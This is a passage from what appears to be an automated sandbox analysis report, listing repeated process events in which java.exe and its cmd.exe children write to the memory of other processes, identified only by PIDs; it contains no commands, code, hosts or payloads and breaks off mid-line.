wrote to memory of 1988 1164 java.exe 78 PID 1164 wrote to memory of 1924 1164 java.exe 80 PID 1164 wrote to memory of 1924 1164 java.exe 80 PID 1164 wrote to memory of 1924 1164 java.exe 80 PID 1164 wrote to memory of 2024 1164 java.exe 82 PID 1164 wrote to memory of 2024 1164 java.exe 82 PID 1164 wrote to memory of 2024 1164 java.exe 82 PID 1164 wrote to memory of 568 1164 java.exe 84 PID 1164 wrote to memory of 568 1164 java.exe 84 PID 1164 wrote to memory of 568 1164 java.exe 84 PID 1164 wrote to memory of 760 1164 java.exe 87 PID 1164 wrote to memory of 760 1164 java.exe 87 PID 1164 wrote to memory of 760 1164 java.exe 87 PID 1164 wrote to memory of 1712 1164 java.exe 89 PID 1164 wrote to memory of 1712 1164 java.exe 89 PID 1164 wrote to memory of 1712 1164 java.exe 89 PID 1164 wrote to memory of 1304 1164 java.exe 91 PID 1164 wrote to memory of 1304 1164 java.exe 91 PID 1164 wrote to memory of 1304 1164 java.exe 91 PID 1164 wrote to memory of 1796 1164 java.exe 93 PID 1164 wrote to memory of 1796 1164 java.exe 93 PID 1164 wrote to memory of 1796 1164 java.exe 93 PID 1164 wrote to memory of 1832 1164 java.exe 95 PID 1164 wrote to memory of 1832 1164 java.exe 95 PID 1164 wrote to memory of 1832 1164 java.exe 95 PID 1164 wrote to memory of 768 1164 java.exe 96 PID 1164 wrote to memory of 768 1164 java.exe 96 PID 1164 wrote to memory of 768 1164 java.exe 96 PID 1164 wrote to memory of 1112 1164 java.exe 98 PID 1164 wrote to memory of 1112 1164 java.exe 98 PID 1164 wrote to memory of 1112 1164 java.exe 98 PID 1164 wrote to memory of 1844 1164 java.exe 100 PID 1164 wrote to memory of 1844 1164 java.exe 100 PID 1164 wrote to memory of 1844 1164 java.exe 100 PID 1164 wrote to memory of 1980 1164 java.exe 103 PID 1164 wrote to memory of 1980 1164 java.exe 103 PID 1164 wrote to memory of 1980 1164 java.exe 103 PID 1164 wrote to memory of 1520 1164 java.exe 106 PID 1164 wrote to memory of 1520 1164 java.exe 106 PID 1164 wrote to memory of 1520 1164 java.exe 106 PID 1164 wrote to memory of 2044 1164 java.exe 109 PID 1164 wrote to memory of 2044 1164 java.exe 109 PID 1164 wrote to memory of 2044 1164 java.exe 109 PID 1164 wrote to memory of 1692 1164 java.exe 111 PID 1164 wrote to memory of 1692 1164 java.exe 111 PID 1164 wrote to memory of 1692 1164 java.exe 111 PID 1164 wrote to memory of 1516 1164 java.exe 113 PID 1164 wrote to memory of 1516 1164 java.exe 113 PID 1164 wrote to memory of 1516 1164 java.exe 113 PID 1164 wrote to memory of 1056 1164 java.exe 115 PID 1164 wrote to memory of 1056 1164 java.exe 115 PID 1164 wrote to memory of 1056 1164 java.exe 115 PID 1164 wrote to memory of 1264 1164 java.exe 117 PID 1164 wrote to memory of 1264 1164 java.exe 117 PID 1164 wrote to memory of 1264 1164 java.exe 117 PID 1164 wrote to memory of 1100 1164 java.exe 119 PID 1164 wrote to memory of 1100 1164 java.exe 119 PID 1164 wrote to memory of 1100 1164 java.exe 119 PID 524 wrote to memory of 864 524 cmd.exe 121 PID 524 wrote to memory of 864 524 cmd.exe 121 PID 524 wrote to memory of 864 524 cmd.exe 121 PID 524 wrote to memory of 2004 524 cmd.exe 122 PID 524 wrote to memory of 2004 524 cmd.exe 122 PID 524 wrote to memory of 2004 524 cmd.exe 122 PID 1164 wrote to memory of 1968 1164 java.exe 123 PID 1164 wrote to memory of 1968 1164 java.exe 123 PID 1164 wrote to memory of 1968 1164 java.exe 123 PID 1968 wrote to memory of 1884 1968 cmd.exe 124 PID 1968 wrote to memory of 1884 1968 cmd.exe 124 PID 1968 wrote to memory of 1884 1968 cmd.exe 124 PID 1968 wrote to memory of 1956 1968 cmd.exe 125 PID 1968 wrote to memory of 1956 1968 cmd.exe 125 PID 1968 wrote to memory of 1956 1968 cmd.exe 125 PID 1164 wrote to memory of 332 1164 java.exe 126 PID 1164 wrote to memory of 332 1164 java.exe 126 PID 1164 wrote to memory of 332 1164 java.exe 126 PID 332 wrote to memory of 1520 332 cmd.exe 127 PID 332 wrote to memory of 1520 332 cmd.exe 127 PID 332 wrote to memory of 1520 332 cmd.exe 127 PID 332 wrote to memory of 760 332 cmd.exe 128 PID 332 wrote to memory of 760 332 cmd.exe 128 PID 332 wrote to memory of 760 332 cmd.exe 128 PID 1164 wrote to memory of 2028 1164 java.exe 129 PID 1164 wrote to memory of 2028 1164 java.exe 129 PID 1164 wrote to memory of 2028 1164 java.exe 129 PID 2028 wrote to memory of 892 2028 cmd.exe 130 PID 2028 wrote to memory of 892 2028 cmd.exe 130 PID 2028 wrote to memory of 892 2028 cmd.exe 130 PID 2028 wrote to memory of 284 2028 cmd.exe 131 PID 2028 wrote to memory of 284 2028 cmd.exe 131 PID 2028 wrote to memory of 284 2028 cmd.exe 131 PID 1164 wrote to memory of 300 1164 java.exe 132 PID 1164 wrote to memory of 300 1164 java.exe 132 PID 1164 wrote to memory of 300 1164 java.exe 132 PID 300 wrote to memory of 268 300 cmd.exe 133 PID 300 wrote to memory of 268 300 cmd.exe 133 PID 300 wrote to memory of 268 300 cmd.exe 133 PID 300 wrote to memory of 1516 300 cmd.exe 134 PID 300 wrote to memory of 1516 300 cmd.exe 134 PID 300 wrote to memory of 1516 300 cmd.exe 134 PID 1164 wrote to memory of 1104 1164 java.exe 135 PID 1164 wrote to memory of 1104 1164 java.exe 135 PID 1164 wrote to memory of 1104 1164 java.exe 135 PID 1104 wrote to memory of 1476 1104 cmd.exe 136 PID 1104 wrote to memory of 1476 1104 cmd.exe 136 PID 1104 wrote to memory of 1476 1104 cmd.exe 136 PID 1104 wrote to memory of 1808 1104 cmd.exe 137 PID 1104 wrote to memory of 1808 1104 cmd.exe 137 PID 1104 wrote to memory of 1808 1104 cmd.exe 137 PID 1164 wrote to memory of 1948 1164 java.exe 138 PID 1164 wrote to memory of 1948 1164 java.exe 138 PID 1164 wrote to memory of 1948 1164 java.exe 138 PID 1948 wrote to memory of 1504 1948 cmd.exe 139 PID 1948 wrote to memory of 1504 1948 cmd.exe 139 PID 1948 wrote to memory of 1504 1948 cmd.exe 139 PID 1948 wrote to memory of 1556 1948 cmd.exe 140 PID 1948 wrote to memory of 1556 1948 cmd.exe 140 PID 1948 wrote to memory of 1556 1948 cmd.exe 140 PID 1164 wrote to memory of 1796 1164 java.exe 141 PID 1164 wrote to memory of 1796 1164 java.exe 141 PID 1164 wrote to memory of 1796 1164 java.exe 141 PID 1796 wrote to memory of 1120 1796 cmd.exe 142 PID 1796 wrote to memory of 1120 1796 cmd.exe 142 PID 1796 wrote to memory of 1120 1796 cmd.exe 142 PID 1796 wrote to memory of 1704 1796 cmd.exe 143 PID 1796 wrote to memory of 1704 1796 cmd.exe 143 PID 1796 wrote to memory of 1704 1796 cmd.exe 143 PID 1164 wrote to memory of 1800 1164 java.exe 144 PID 1164 wrote to memory of 1800 1164 java.exe 144 PID 1164 wrote to memory of 1800 1164 java.exe 144 PID 1800 wrote to memory of 796 1800 cmd.exe 145 PID 1800 wrote to memory of 796 1800 cmd.exe 145 PID 1800 wrote to memory of 796 1800 cmd.exe 145 PID 1164 wrote to memory of 1816 1164 java.exe 146 PID 1164 wrote to memory of 1816 1164 java.exe 146 PID 1164 wrote to memory of 1816 1164 java.exe 146 PID 1800 wrote to memory of 2012 1800 cmd.exe 148 PID 1800 wrote to memory of 2012 1800 cmd.exe 148 PID 1800 wrote to memory of 2012 1800 cmd.exe 148 PID 1164 wrote to memory of 1764 1164 java.exe 149 PID 1164 wrote to memory of 1764 1164 java.exe 149 PID 1164 wrote to memory of 1764 1164 java.exe 149 PID 1764 wrote to memory of 1824 1764 cmd.exe 150 PID 1764 wrote to memory of 1824 1764 cmd.exe 150 PID 1764 wrote to memory of 1824 1764 cmd.exe 150 PID 1764 wrote to memory of 1264 1764 cmd.exe 151 PID 1764 wrote to memory of 1264 1764 cmd.exe 151 PID 1764 wrote to memory of 1264 1764 cmd.exe 151 PID 1164 wrote to memory of 1944 1164 java.exe 152 PID 1164 wrote to memory of 1944 1164 java.exe 152 PID 1164 wrote to memory of 1944 1164 java.exe 152 PID 1944 wrote to memory of 2036 1944 cmd.exe 153 PID 1944 wrote to memory of 2036 1944 cmd.exe 153 PID 1944 wrote to memory of 2036 1944 cmd.exe 153 PID 1944 wrote to memory of 1412 1944 cmd.exe 154 PID 1944 wrote to memory of 1412 1944 cmd.exe 154 PID 1944 wrote to memory of 1412 1944 cmd.exe 154 PID 1164 wrote to memory of 1876 1164 java.exe 155 PID 1164 wrote to memory of 1876 1164 java.exe 155 PID 1164 wrote to memory of 1876 1164 java.exe 155 PID 1876 wrote to memory of 1960 1876 cmd.exe 156 PID 1876 wrote to memory of 1960 1876 cmd.exe 156 PID 1876 wrote to memory of 1960 1876 cmd.exe 156 PID 1876 wrote to memory of 776 1876 cmd.exe 157 PID 1876 wrote to memory of 776 1876 cmd.exe 157 PID 1876 wrote to memory of 776 1876 cmd.exe 157 PID 1164 wrote to memory of 612 1164 java.exe 158 PID 1164 wrote to memory of 612 1164 java.exe 158 PID 1164 wrote to memory of 612 1164 java.exe 158 PID 612 wrote to memory of 864 612 cmd.exe 159 PID 612 wrote to memory of 864 612 cmd.exe 159 PID 612 wrote to memory of 864 612 cmd.exe 159 PID 612 wrote to memory of 1904 612 cmd.exe 160 PID 612 wrote to memory of 1904 612 cmd.exe 160 PID 612 wrote to memory of 1904 612 cmd.exe 160 PID 1164 wrote to memory of 1292 1164 java.exe 161 PID 1164 wrote to memory of 1292 1164 java.exe 161 PID 1164 wrote to memory of 1292 1164 java.exe 161 PID 1292 wrote to memory of 660 1292 cmd.exe 162 PID 1292 wrote to memory of 660 1292 cmd.exe 162 PID 1292 wrote to memory of 660 1292 cmd.exe 162 PID 1292 wrote to memory of 1588 1292 cmd.exe 163 PID 1292 wrote to memory of 1588 1292 cmd.exe 163 PID 1292 wrote to memory of 1588 1292 cmd.exe 163 PID 1164 wrote to memory of 768 1164 java.exe 164 PID 1164 wrote to memory of 768 1164 java.exe 164 PID 1164 wrote to memory of 768 1164 java.exe 164 PID 768 wrote to memory of 1964 768 cmd.exe 165 PID 768 wrote to memory of 1964 768 cmd.exe 165 PID 768 wrote to memory of 1964 768 cmd.exe 165 PID 768 wrote to memory of 1116 768 cmd.exe 166 PID 768 wrote to memory of 1116 768 cmd.exe 166 PID 768 wrote to memory of 1116 768 cmd.exe 166 PID 1164 wrote to memory of 1520 1164 java.exe 167 PID 1164 wrote to memory of 1520 1164 java.exe 167 PID 1164 wrote to memory of 1520 1164 java.exe 167 PID 1520 wrote to memory of 764 1520 cmd.exe 168 PID 1520 wrote to memory of 764 1520 cmd.exe 168 PID 1520 wrote to memory of 764 1520 cmd.exe 168 PID 1520 wrote to memory of 1976 1520 cmd.exe 169 PID 1520 wrote to memory of 1976 1520 cmd.exe 169 PID 1520 wrote to memory of 1976 1520 cmd.exe 169 PID 1164 wrote to memory of 284 1164 java.exe 170 PID 1164 wrote to memory of 284 1164 java.exe 170 PID 1164 wrote to memory of 284 1164 java.exe 170 PID 284 wrote to memory of 1680 284 cmd.exe 171 PID 284 wrote to memory of 1680 284 cmd.exe 171 PID 284 wrote to memory of 1680 284 cmd.exe 171 PID 284 wrote to memory of 592 284 cmd.exe 172 PID 284 wrote to memory of 592 284 cmd.exe 172 PID 284 wrote to memory of 592 284 cmd.exe 172 PID 1164 wrote to memory of 1080 1164 java.exe 173 PID 1164 wrote to memory of 1080 1164 java.exe 173 PID 1164 wrote to memory of 1080 1164 java.exe 173 PID 1080 wrote to memory of 1476 1080 cmd.exe 174 PID 1080 wrote to memory of 1476 1080 cmd.exe 174 PID 1080 wrote to memory of 1476 1080 cmd.exe 174 PID 1080 wrote to memory of 1888 1080 cmd.exe 175 PID 1080 wrote to memory of 1888 1080 cmd.exe 175 PID 1080 wrote to memory of 1888 1080 cmd.exe 175 PID 1164 wrote to memory of 344 1164 java.exe 176 PID 1164 wrote to memory of 344 1164 java.exe 176 PID 1164 wrote to memory of 344 1164 java.exe 176 PID 344 wrote to memory of 1556 344 cmd.exe 177 PID 344 wrote to memory of 1556 344 cmd.exe 177 PID 344 wrote to memory of 1556 344 cmd.exe 177 PID 344 wrote to memory of 1380 344 cmd.exe 178 PID 344 wrote to memory of 1380 344 cmd.exe 178 PID 344 wrote to memory of 1380 344 cmd.exe 178 PID 1164 wrote to memory of 1856 1164 java.exe 179 PID 1164 wrote to memory of 1856 1164 java.exe 179 PID 1164 wrote to memory of 1856 1164 java.exe 179 PID 1856 wrote to memory of 1636 1856 cmd.exe 180 PID 1856 wrote to memory of 1636 1856 cmd.exe 180 PID 1856 wrote to memory of 1636 1856 cmd.exe 180 PID 1856 wrote to memory of 1840 1856 cmd.exe 181 PID 1856 wrote to memory of 1840 1856 cmd.exe 181 PID 1856 wrote to memory of 1840 1856 cmd.exe 181 PID 1164 wrote to memory of 1576 1164 java.exe 182 PID 1164 wrote to memory of 1576 1164 java.exe 182 PID 1164 wrote to memory of 1576 1164 java.exe 182 PID 1576 wrote to memory of 888 1576 cmd.exe 183 PID 1576 wrote to memory of 888 1576 cmd.exe 183 PID 1576 wrote to memory of 888 1576 cmd.exe 183 PID 1576 wrote to memory of 1824 1576 cmd.exe 184 PID 1576 wrote to memory of 1824 1576 cmd.exe 184 PID 1576 wrote to memory of 1824 1576 cmd.exe 184 PID 1164 wrote to memory of 2024 1164 java.exe 185 PID 1164 wrote to memory of 2024 1164 java.exe 185 PID 1164 wrote to memory of 2024 1164 java.exe 185 PID 2024 wrote to memory of 1660 2024 cmd.exe 186 PID 2024 wrote to memory of 1660 2024 cmd.exe 186 PID 2024 wrote to memory of 1660 2024 cmd.exe 186 PID 2024 wrote to memory of 1496 2024 cmd.exe 187 PID 2024 wrote to memory of 1496 2024 cmd.exe 187 PID 2024 wrote to memory of 1496 2024 cmd.exe 187 PID 1164 wrote to memory of 1064 1164 java.exe 188 PID 1164 wrote to memory of 1064 1164 java.exe 188 PID 1164 wrote to memory of 1064 1164 java.exe 188 PID 1164 wrote to memory of 1076 1164 java.exe 189 PID 1164 wrote to memory of 1076 1164 java.exe 189 PID 1164 wrote to memory of 1076 1164 java.exe 189 PID 1076 wrote to memory of 2028 1076 cmd.exe 191 PID 1076 wrote to memory of 2028 1076 cmd.exe 191 PID 1076 wrote to memory of 2028 1076 cmd.exe 191 PID 1076 wrote to memory of 1984 1076 cmd.exe 192 PID 1076 wrote to memory of 1984 1076 cmd.exe 192 PID 1076 wrote to memory of 1984 1076 cmd.exe 192 PID 1164 wrote to memory of 1764 1164 java.exe 193 PID 1164 wrote to memory of 1764 1164 java.exe 193 PID 1164 wrote to memory of 1764 1164 java.exe 193 PID 1764 wrote to memory of 1104 1764 cmd.exe 194 PID 1764 wrote to memory of 1104 1764 cmd.exe 194 PID 1764 wrote to memory of 1104 1764 cmd.exe 194 PID 1764 wrote to memory of 608 1764 cmd.exe 195 PID 1764 wrote to memory of 608 1764 cmd.exe 195 PID 1764 wrote to memory of 608 1764 cmd.exe 195 PID 1164 wrote to memory of 1644 1164 java.exe 196 PID 1164 wrote to memory of 1644 1164 java.exe 196 PID 1164 wrote to memory of 1644 1164 java.exe 196 PID 1644 wrote to memory of 1960 1644 cmd.exe 197 PID 1644 wrote to memory of 1960 1644 cmd.exe 197 PID 1644 wrote to memory of 1960 1644 cmd.exe 197 PID 1644 wrote to memory of 1844 1644 cmd.exe 198 PID 1644 wrote to memory of 1844 1644 cmd.exe 198 PID 1644 wrote to memory of 1844 1644 cmd.exe 198 PID 1164 wrote to memory of 1980 1164 java.exe 199 PID 1164 wrote to memory of 1980 1164 java.exe 199 PID 1164 wrote to memory of 1980 1164 java.exe 199 PID 1980 wrote to memory of 1904 1980 cmd.exe 200 PID 1980 wrote to memory of 1904 1980 cmd.exe 200 PID 1980 wrote to memory of 1904 1980 cmd.exe 200 PID 1980 wrote to memory of 544 1980 cmd.exe 201 PID 1980 wrote to memory of 544 1980 cmd.exe 201 PID 1980 wrote to memory of 544 1980 cmd.exe 201 PID 1164 wrote to memory of 1100 1164 java.exe 202 PID 1164 wrote to memory of 1100 1164 java.exe 202 PID 1164 wrote to memory of 1100 1164 java.exe 202 PID 1100 wrote to memory of 1492 1100 cmd.exe 203 PID 1100 wrote to memory of 1492 1100 cmd.exe 203 PID 1100 wrote to memory of 1492 1100 cmd.exe 203 PID 1100 wrote to memory of 1964 1100 cmd.exe 204 PID 1100 wrote to memory of 1964 1100 cmd.exe 204 PID 1100 wrote to memory of 1964 1100 cmd.exe 204 PID 1164 wrote to memory of 760 1164 java.exe 205 PID 1164 wrote to memory of 760 1164 java.exe 205 PID 1164 wrote to memory of 760 1164 java.exe 205 PID 760 wrote to memory of 1572 760 cmd.exe 206 PID 760 wrote to memory of 1572 760 cmd.exe 206 PID 760 wrote to memory of 1572 760 cmd.exe 206 PID 760 wrote to memory of 1976 760 cmd.exe 207 PID 760 wrote to memory of 1976 760 cmd.exe 207 PID 760 wrote to memory of 1976 760 cmd.exe 207 PID 1164 wrote to memory of 1620 1164 java.exe 208 PID 1164 wrote to memory of 1620 1164 java.exe 208 PID 1164 wrote to memory of 1620 1164 java.exe 208 PID 1620 wrote to memory of 1516 1620 cmd.exe 209 PID 1620 wrote to memory of 1516 1620 cmd.exe 209 PID 1620 wrote to memory of 1516 1620 cmd.exe 209 PID 1620 wrote to memory of 1808 1620 cmd.exe 210 PID 1620 wrote to memory of 1808 1620 cmd.exe 210 PID 1620 wrote to memory of 1808 1620 cmd.exe 210 PID 1164 wrote to memory of 1476 1164 java.exe 211 PID 1164 wrote to memory of 1476 1164 java.exe 211 PID 1164 wrote to memory of 1476 1164 java.exe 211 PID 1476 wrote to memory of 1860 1476 cmd.exe 212 PID 1476 wrote to memory of 1860 1476 cmd.exe 212 PID 1476 wrote to memory of 1860 1476 cmd.exe 212 PID 1476 wrote to memory of 1120 1476 cmd.exe 213 PID 1476 wrote to memory of 1120 1476 cmd.exe 213 PID 1476 wrote to memory of 1120 1476 cmd.exe 213 PID 1164 wrote to memory of 1380 1164 java.exe 214 PID 1164 wrote to memory of 1380 1164 java.exe 214 PID 1164 wrote to memory of 1380 1164 java.exe 214 PID 1380 wrote to memory of 1632 1380 cmd.exe 215 PID 1380 wrote to memory of 1632 1380 cmd.exe 215 PID 1380 wrote to memory of 1632 1380 cmd.exe 215 PID 1380 wrote to memory of 1900 1380 cmd.exe 216 PID 1380 wrote to memory of 1900 1380 cmd.exe 216 PID 1380 wrote to memory of 1900 1380 cmd.exe 216 PID 1164 wrote to memory of 804 1164 java.exe 217 PID 1164 wrote to memory of 804 1164 java.exe 217 PID 1164 wrote to memory of 804 1164 java.exe 217 PID 804 wrote to memory of 888 804 cmd.exe 218 PID 804 wrote to memory of 888 804 cmd.exe 218 PID 804 wrote to memory of 888 804 cmd.exe 218 PID 804 wrote to memory of 1928 804 cmd.exe 219 PID 804 wrote to memory of 1928 804 cmd.exe 219 PID 804 wrote to memory of 1928 804 cmd.exe 219 PID 1164 wrote to memory of 1332 1164 java.exe 220 PID 1164 wrote to memory of 1332 1164 java.exe 220 PID 1164 wrote to memory of 1332 1164 java.exe 220 PID 1332 wrote to memory of 1496 1332 cmd.exe 221 PID 1332 wrote to memory of 1496 1332 cmd.exe 221 PID 1332 wrote to memory of 1496 1332 cmd.exe 221 PID 1332 wrote to memory of 1536 1332 cmd.exe 222 PID 1332 wrote to memory of 1536 1332 cmd.exe 222 PID 1332 wrote to memory of 1536 1332 cmd.exe 222 PID 1164 wrote to memory of 576 1164 java.exe 223 PID 1164 wrote to memory of 576 1164 java.exe 223 PID 1164 wrote to memory of 576 1164 java.exe 223 PID 576 wrote to memory of 1984 576 cmd.exe 224 PID 576 wrote to memory of 1984 576 cmd.exe 224 PID 576 wrote to memory of 1984 576 cmd.exe 224 PID 576 wrote to memory of 2032 576 cmd.exe 225 PID 576 wrote to memory of 2032 576 cmd.exe 225 PID 576 wrote to memory of 2032 576 cmd.exe 225 PID 1164 wrote to memory of 1968 1164 java.exe 226 PID 1164 wrote to memory of 1968 1164 java.exe 226 PID 1164 wrote to memory of 1968 1164 java.exe 226 PID 1968 wrote to memory of 300 1968 cmd.exe 227 PID 1968 wrote to memory of 300 1968 cmd.exe 227 PID 1968 wrote to memory of 300 1968 cmd.exe 227 PID 1968 wrote to memory of 2036 1968 cmd.exe 228 PID 1968 wrote to memory of 2036 1968 cmd.exe 228 PID 1968 wrote to memory of 2036 1968 cmd.exe 228 PID 1164 wrote to memory of 1104 1164 java.exe 229 PID 1164 wrote to memory of 1104 1164 java.exe 229 PID 1164 wrote to memory of 1104 1164 java.exe 229 PID 1104 wrote to memory of 1932 1104 cmd.exe 230 PID 1104 wrote to memory of 1932 1104 cmd.exe 230 PID 1104 wrote to memory of 1932 1104 cmd.exe 230 PID 1104 wrote to memory of 1036 1104 cmd.exe 231 PID 1104 wrote to memory of 1036 1104 cmd.exe 231 PID 1104 wrote to memory of 1036 1104 cmd.exe 231 PID 1164 wrote to memory of 1844 1164 java.exe 232 PID 1164 wrote to memory of 1844 1164 java.exe 232 PID 1164 wrote to memory of 1844 1164 java.exe 232 PID 1844 wrote to memory of 1828 1844 cmd.exe 233 PID 1844 wrote to memory of 1828 1844 cmd.exe 233 PID 1844 wrote to memory of 1828 1844 cmd.exe 233 PID 1164 wrote to memory of 1648 1164 java.exe 234 PID 1164 wrote to memory of 1648 1164 java.exe 234 PID 1164 wrote to memory of 1648 1164 java.exe 234 PID 1844 wrote to memory of 1604 1844 cmd.exe 235 PID 1844 wrote to memory of 1604 1844 cmd.exe 235 PID 1844 wrote to memory of 1604 1844 cmd.exe 235 PID 1164 wrote to memory of 892 1164 java.exe 237 PID 1164 wrote to memory of 892 1164 java.exe 237 PID 1164 wrote to memory of 892 1164 java.exe 237 PID 892 wrote to memory of 1976 892 cmd.exe 238 PID 892 wrote to memory of 1976 892 cmd.exe 238 PID 892 wrote to memory of 1976 892 cmd.exe 238 PID 892 wrote to memory of 1516 892 cmd.exe 239 PID 892 wrote to memory of 1516 892 cmd.exe 239 PID 892 wrote to memory of 1516 892 cmd.exe 239 PID 1164 wrote to memory of 1888 1164 java.exe 240 PID 1164 wrote to memory of 1888 1164 java.exe 240 PID 1164 wrote to memory of 1888 1164 java.exe 240 PID 1888 wrote to memory of 1860 1888 cmd.exe 241 PID 1888 wrote to memory of 1860 1888 cmd.exe 241 PID 1888 wrote to memory of 1860 1888 cmd.exe 241 PID 1888 wrote to memory of 1636 1888 cmd.exe 242 PID 1888 wrote to memory of 1636 1888 cmd.exe 242 PID 1888 wrote to memory of 1636 1888 cmd.exe 242 PID 1164 wrote to memory of 1632 1164 java.exe 243 PID 1164 wrote to memory of 1632 1164 java.exe 243 PID 1164 wrote to memory of 1632 1164 java.exe 243 PID 1632 wrote to memory of 1264 1632 cmd.exe 244 PID 1632 wrote to memory of 1264 1632 cmd.exe 244 PID 1632 wrote to memory of 1264 1632 cmd.exe 244 PID 1632 wrote to memory of 1624 1632 cmd.exe 245 PID 1632 wrote to memory of 1624 1632 cmd.exe 245 PID 1632 wrote to memory of 1624 1632 cmd.exe 245 PID 1164 wrote to memory of 1928 1164 java.exe 246 PID 1164 wrote to memory of 1928 1164 java.exe 246 PID 1164 wrote to memory of 1928 1164 java.exe 246 PID 1928 wrote to memory of 528 1928 cmd.exe 247 PID 1928 wrote to memory of 528 1928 cmd.exe 247 PID 1928 wrote to memory of 528 1928 cmd.exe 247 PID 1928 wrote to memory of 332 1928 cmd.exe 248 PID 1928 wrote to memory of 332 1928 cmd.exe 248 PID 1928 wrote to memory of 332 1928 cmd.exe 248 PID 1164 wrote to memory of 1948 1164 java.exe 249 PID 1164 wrote to memory of 1948 1164 java.exe 249 PID 1164 wrote to memory of 1948 1164 java.exe 249 PID 1948 wrote to memory of 1984 1948 cmd.exe 250 PID 1948 wrote to memory of 1984 1948 cmd.exe 250 PID 1948 wrote to memory of 1984 1948 cmd.exe 250 PID 1948 wrote to memory of 1064 1948 cmd.exe 251 PID 1948 wrote to memory of 1064 1948 cmd.exe 251 PID 1948 wrote to memory of 1064 1948 cmd.exe 251 PID 1164 wrote to memory of 1992 1164 java.exe 252 PID 1164 wrote to memory of 1992 1164 java.exe 252 PID 1164 wrote to memory of 1992 1164 java.exe 252 PID 1992 wrote to memory of 2036 1992 cmd.exe 253 PID 1992 wrote to memory of 2036 1992 cmd.exe 253 PID 1992 wrote to memory of 2036 1992 cmd.exe 253 PID 1992 wrote to memory of 776 1992 cmd.exe 254 PID 1992 wrote to memory of 776 1992 cmd.exe 254 PID 1992 wrote to memory of 776 1992 cmd.exe 254 PID 1164 wrote to memory of 1960 1164 java.exe 255 PID 1164 wrote to memory of 1960 1164 java.exe 255 PID 1164 wrote to memory of 1960 1164 java.exe 255 PID 1960 wrote to memory of 1904 1960 cmd.exe 256 PID 1960 wrote to memory of 1904 1960 cmd.exe 256 PID 1960 wrote to memory of 1904 1960 cmd.exe 256 PID 1960 wrote to memory of 1492 1960 cmd.exe 257 PID 1960 wrote to memory of 1492 1960 cmd.exe 257 PID 1960 wrote to memory of 1492 1960 cmd.exe 257 PID 1164 wrote to memory of 1956 1164 java.exe 258 PID 1164 wrote to memory of 1956 1164 java.exe 258 PID 1164 wrote to memory of 1956 1164 java.exe 258 PID 1956 wrote to memory of 848 1956 cmd.exe 259 PID 1956 wrote to memory of 848 1956 cmd.exe 259 PID 1956 wrote to memory of 848 1956 cmd.exe 259 PID 1956 wrote to memory of 1976 1956 cmd.exe 260 PID 1956 wrote to memory of 1976 1956 cmd.exe 260 PID 1956 wrote to memory of 1976 1956 cmd.exe 260 PID 1164 wrote to memory of 1056 1164 java.exe 261 PID 1164 wrote to memory of 1056 1164 java.exe 261 PID 1164 wrote to memory of 1056 1164 java.exe 261 PID 1056 wrote to memory of 1784 1056 cmd.exe 262 PID 1056 wrote to memory of 1784 1056 cmd.exe 262 PID 1056 wrote to memory of 1784 1056 cmd.exe 262 PID 1056 wrote to memory of 1656 1056 cmd.exe 263 PID 1056 wrote to memory of 1656 1056 cmd.exe 263 PID 1056 wrote to memory of 1656 1056 cmd.exe 263 PID 1164 wrote to memory of 1964 1164 java.exe 264 PID 1164 wrote to memory of 1964 1164 java.exe 264 PID 1164 wrote to memory of 1964 1164 java.exe 264 PID 1964 wrote to memory of 1556 1964 cmd.exe 265 PID 1964 wrote to memory of 1556 1964 cmd.exe 265 PID 1964 wrote to memory of 1556 1964 cmd.exe 265 PID 1964 wrote to memory of 796 1964 cmd.exe 266 PID 1964 wrote to memory of 796 1964 cmd.exe 266 PID 1964 wrote to memory of 796 1964 cmd.exe 266 PID 1164 wrote to memory of 668 1164 java.exe 267 PID 1164 wrote to memory of 668 1164 java.exe 267 PID 1164 wrote to memory of 668 1164 java.exe 267 PID 668 wrote to memory of 1264 668 cmd.exe 268 PID 668 wrote to memory of 1264 668 cmd.exe 268 PID 668 wrote to memory of 1264 668 cmd.exe 268 PID 668 wrote to memory of 1692 668 cmd.exe 269 PID 668 wrote to memory of 1692 668 cmd.exe 269 PID 668 wrote to memory of 1692 668 cmd.exe 269 PID 1164 wrote to memory of 1800 1164 java.exe 270 PID 1164 wrote to memory of 1800 1164 java.exe 270 PID 1164 wrote to memory of 1800 1164 java.exe 270 PID 1800 wrote to memory of 332 1800 cmd.exe 271 PID 1800 wrote to memory of 332 1800 cmd.exe 271 PID 1800 wrote to memory of 332 1800 cmd.exe 271 PID 1800 wrote to memory of 1528 1800 cmd.exe 272 PID 1800 wrote to memory of 1528 1800 cmd.exe 272 PID 1800 wrote to memory of 1528 1800 cmd.exe 272 PID 1164 wrote to memory of 1796 1164 java.exe 273 PID 1164 wrote to memory of 1796 1164 java.exe 273 PID 1164 wrote to memory of 1796 1164 java.exe 273 PID 1796 wrote to memory of 1820 1796 cmd.exe 274 PID 1796 wrote to memory of 1820 1796 cmd.exe 274 PID 1796 wrote to memory of 1820 1796 cmd.exe 274 PID 1796 wrote to memory of 2036 1796 cmd.exe 275 PID 1796 wrote to memory of 2036 1796 cmd.exe 275 PID 1796 wrote to memory of 2036 1796 cmd.exe 275 PID 1164 wrote to memory of 1672 1164 java.exe 276 PID 1164 wrote to memory of 1672 1164 java.exe 276 PID 1164 wrote to memory of 1672 1164 java.exe 276 PID 1672 wrote to memory of 1828 1672 cmd.exe 277 PID 1672 wrote to memory of 1828 1672 cmd.exe 277 PID 1672 wrote to memory of 1828 1672 cmd.exe 277 PID 1672 wrote to memory of 1492 1672 cmd.exe 278 PID 1672 wrote to memory of 1492 1672 cmd.exe 278 PID 1672 wrote to memory of 1492 1672 cmd.exe 278 PID 1164 wrote to memory of 1680 1164 java.exe 279 PID 1164 wrote to memory of 1680 1164 java.exe 279 PID 1164 wrote to memory of 1680 1164 java.exe 279 PID 1680 wrote to memory of 1168 1680 cmd.exe 280 PID 1680 wrote to memory of 1168 1680 cmd.exe 280 PID 1680 wrote to memory of 1168 1680 cmd.exe 280 PID 1680 wrote to memory of 1572 1680 cmd.exe 281 PID 1680 wrote to memory of 1572 1680 cmd.exe 281 PID 1680 wrote to memory of 1572 1680 cmd.exe 281 PID 1164 wrote to memory of 1784 1164 java.exe 282 PID 1164 wrote to memory of 1784 1164 java.exe 282 PID 1164 wrote to memory of 1784 1164 java.exe 282 PID 1784 wrote to memory of 1120 1784 cmd.exe 283 PID 1784 wrote to memory of 1120 1784 cmd.exe 283 PID 1784 wrote to memory of 1120 1784 cmd.exe 283 PID 1784 wrote to memory of 1900 1784 cmd.exe 284 PID 1784 wrote to memory of 1900 1784 cmd.exe 284 PID 1784 wrote to memory of 1900 1784 cmd.exe 284 PID 1164 wrote to memory of 